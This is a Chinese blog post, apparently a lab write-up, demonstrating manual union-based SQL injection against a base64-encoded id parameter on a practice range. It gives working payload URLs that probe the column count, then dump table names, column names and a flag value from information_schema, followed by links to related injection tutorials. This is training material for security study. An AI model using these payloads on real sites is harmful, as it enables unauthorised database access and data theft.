SQL注入实战————1、MySQL手工注入实战
无意中发现了一个巨牛巨牛的人工智能教程,忍不住分享一下给大家。教程不仅是零基础,通俗易懂,小白也能学,而且非常风趣幽默,还时不时有内涵段子,像看小说一样,哈哈~我正在学习中,觉得太牛了,所以分享给大家。点这里可以跳转到教程!
SQL注入实战
靶场地址:http://219.153.49.228:48204/show.php?id=MQ==
首先可以看到该URL中存在一个参数“MQ==”,从参数的格式来看是通过了base64进行了加密,那么我们可以对其进行base64解密
发现解密之后的参数为1,这种类型的注入除了和我们以前的普通注入相比只是多了一个“base64”加密的过程,下面进行手工注入演示:
说明:下面的URL为了让读者可以看清,所以没有进行URL的base64加密,但是读者在执行前需要对其进行base64加密,之后才可以正常执行!
1、判断是否可以注入:
单引号测试
and 测试
由上判断可以得知存在SQL注入
2、猜解字段长度
order by 2
order by 3
可以猜到字段长度为2
3、爆数据库名、数据库版本信息
4、爆表名
http://219.153.49.228:48204/show.php?id=-1 union select TABLE_NAME,2 from information_schema.TABLES where TABLE_SCHEMA=0x74657374 limit 0,1--
5、爆字段名
http://219.153.49.228:48204/show.php?id=-1 union select COLUMN_NAME,2 from information_schema.COLUMNS where TABLE_NAME=0x64617461 limit 3,1
6、爆字段值
http://219.153.49.228:48204/show.php?id=-1 union select thekey,2 from test.data limit 0,1--
至此得到最后的内容!
如有任何疑问,请使用chat快问,扫码提问!博主闭关阶段!
SQL注入实战————1、MySQL手工注入实战相关推荐
- SQL注入第二章节MYSQL手工注入
SQL注入第二章节MYSQL手工注入 2.1 SQL注入之sqli-labs环境搭建 一.SQLi-Labs是什么? SQLi-Labs是一个专业的SQL注入练习平台,适用于GET和POST场景,包含 ...
- php手工注入语句,PHP+MySQL 手工注入语句大全
我PHP手工太菜了, 无奈只能补下PHP MYSQL手工注射,把收集总结的资料分享下. 暴字段长度 Order by num/* 匹配字段 and 1=1 union select 1,2,3,4,5 ...
- mysql 4.0手工注入_手工注入——MySQL手工注入实战和分析
前言 今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 查 ...
- mysql报错注入实战_手工注入——MySQL手工注入实战和分析
今天进行了MySQL手工注入实战,分享一下自己的实战过程和总结,这里环境使用的是墨者学院的在线靶场.话不多说,咱们直接开始. 第一步,判断注入点 通过 ' 和构造 and 1=1 和 and 1=2 ...
- 【SQL注入】通过实战教你手工注入MySql数据库
[SQL注入]通过实战教你手工注入MySql数据库 Hello,各位小伙伴们大家晚上好~~ 不知不觉,已经是本公众号的第八篇技术文章了,你们都有认真阅读吗? 正当小编发愁下一篇写什么的时候,鲁迅发话了 ...
- mysql union as 注入_sql注入入门 之 mysql 常规注入 [ union方式 ]
1,常规数字型 mysql 实例注入点,如下:1https://www.vuln.com/md_materia_profile_view.php?viewid=2 2,依旧先尝试下经典的单引号,如下, ...
- mysql 手工sql注入_【sql注入专题02】Mysql手工注入流程
0x00 SQL注入的语句介绍 SQL注入的本质 sql注入的本质就是查询某个数据库下的某个表中的某些字段的内容,比如我们平时在数据库查询一条数据时操作. mysql> use security ...
- mysql手工注入imformation_网络安全系列之十八 MySQL基本操作(PHP注入基础)
在之前的博文中曾介绍过如何对ASP网站进行手工注入,ASP网站大都是采用ACCESS或MSSQL数据库,因而所谓针对ASP的SQL注入其实也就是根据ACCESS或MSSQL数据库的特点来构造查询语句. ...
- PHP+MySQL手工注入
1.发现注入点: 202.1.160.100/xycms/showproducts.php?id=12 and 1=1 202.1.160.100/xycms/showproducts.php?id= ...
最新文章
- 触控(Touch) 、 布局(Layout)
- goaccess_nginx日志分析工具
- h5 server send event(sse)
- 互联网知识:工作多年的程序员都说不全
- bootstrap 点击按钮刷新_Thyemlef动态刷新页面方法
- 又一款代替PanDownload的百度网盘不限速下载工具利器 – 雷鸟下载
- ubuntu下锐捷客户端连接校园网
- Java项目:宠物店管理系统(java+JSP+JavaScript+Bootstrap+Mysql)
- dataload mysql_如何向eova中添加新的数据源呢
- Mac操作系统输入法快捷键设置
- Java 基础学习笔记
- python 手机号码归属 ip地址查询
- 苹果cms新手快速入门常见问题汇总及解决教程
- HTML中给div加超链接
- CSS3 实现可爱的动物动态的哈士奇动画
- 南通大学教务管理微信公众号的用户体验
- 笔记本电脑的应用、维护、采购全攻略
- 2018技术胖Web前端视频教程全套
- 对finalize的理解
- 英伟达Q3财报解读:营收连续四季度下滑 下一个增长拐点何时来?
热门文章
- c++opencvtesseract-ocr截屏处理图像 文字识别
- android 误触屏幕失灵,华为手机触摸屏没反应怎么办?解决手机触摸屏时灵时不灵的办法...
- CNTK-106 Part A:ValueError
- volte 通话通过什么和modem交互?
- [ACNOI2022]提交答案题
- IOS使用Scriptable安装京豆小组件教程
- 微信小程序 学生健康校医院电子病历系统
- Win10开机按F8进不了安全模式没反应 Win10开机按F8怎么无法进入安全模式
- 关于生成\读取 一维码二维码的方法
- chrome“始终在关联的应用中打开这些类型的链接”问题不能修改关联打开应用